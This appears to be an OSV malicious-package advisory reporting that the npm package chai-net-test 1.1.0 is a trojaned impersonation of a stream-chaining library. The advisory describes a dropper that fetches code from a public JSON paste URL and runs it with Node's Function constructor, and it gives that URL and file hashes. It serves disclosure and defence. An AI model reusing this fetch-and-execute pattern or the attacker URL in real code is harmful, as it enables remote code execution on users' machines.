MAL-2026-5607

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/chai-net-test/MAL-2026-5607.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5607

Published

2026-06-11T07:41:17Z

Modified

2026-06-11T08:01:31.204160208Z

Summary

Malicious code in chai-net-test (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (cd5f4bb3d7abae3be57c7521b84016b6484d4c21bd2898fcde043d376513cf1e)

chai-net-test ships a remote-code-execution dropper behind its public chain() API. When a consumer calls chain([...]) (the documented entry point), src/index.js spawns src/utils/swap.js as a detached child Node process. swap.js performs axios.get('https://www.jsonkeeper.com/b/5IZTJ'), takes the response's .Cookie string, builds a function via new Function.constructor('require', s), and invokes it with the package's require — granting the attacker-supplied JavaScript full Node module access on the consumer's machine. The destination is jsonkeeper.com, a public anonymous JSON paste host whose contents are fully mutable by whoever holds the paste id, so the executed bytes can change at any moment without any package republish. The package additionally impersonates the legitimate stream-chaining library chain by uhop: the README claims to be a 'lightweight, no-dependencies micro-package' and links to uhop's wiki, while package.json declares runtime dependencies on axios and sqlite3 — a cover-story to lure consumers of the real library into invoking the trojaned API.

Database specific

{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-005709",
            "versions": [
                "1.1.0"
            ],
            "sha256": "cd5f4bb3d7abae3be57c7521b84016b6484d4c21bd2898fcde043d376513cf1e",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T07:41:17Z",
            "import_time": "2026-06-11T07:49:43.445804625Z"
        }
    ]
}

References

https://www.npmjs.com/package/chai-net-test/v/1.1.0

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / chai-net-test

Package

Name: chai-net-test; View open source insights on deps.dev
Purl: pkg:npm/chai-net-test

Affected ranges

Affected versions

1.*

1.1.0

Database specific

indicators

{
    "evidence_files": [
        {
            "path": "src/utils/swap.js",
            "sha256": "4a0017b65e11fcd09a3fe9a33ef4a08712ce4330e2eb03eb7d0c4ef5a311d8e5",
            "tlsh": "2601978f70ac545c09b013e6bb2be436f522b56a390281d0339c86421f769a96653eee"
        },
        {
            "path": "package.json",
            "sha256": "93e6a386d4d72f48f43e437d73ee8a02276c567d8ffc6829fa1be7c3775ebc08",
            "tlsh": "1a417a32d4729c9306c51525e8ad1a1762a088abcf84fd5ab78242accf4d46f58bc76f"
        }
    ],
    "package_integrity": [
        {
            "filename": "chai-net-test-1.1.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-l5Z6rw56SyhxbSseKCklCZ+jsD5hW4EYLfDNitevW1TGJXBltQ4+RLmExgf+4YaARiY6usQv1g76GbdQdvj/Ww==",
                "sha1": "4c7cf33e8768e115f8dbdf0757833c5a39f52101"
            }
        }
    ]
}

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/chai-net-test/MAL-2026-5607.json"

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]